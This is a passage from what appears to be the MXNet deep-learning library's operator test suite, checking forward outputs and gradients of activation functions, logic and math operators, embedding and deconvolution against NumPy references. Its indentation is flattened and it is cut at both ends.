for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0].asnumpy()
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0].asnumpy()
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0].asnumpy()
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out.asnumpy(), reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out.asnumpy(), reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0].asnumpy(), np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"].asnumpy(), np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0].asnumpy(), data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
assert_almost_equal(arr_grad2.asnumpy(), npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0].asnumpy(), rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy(), deconv_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
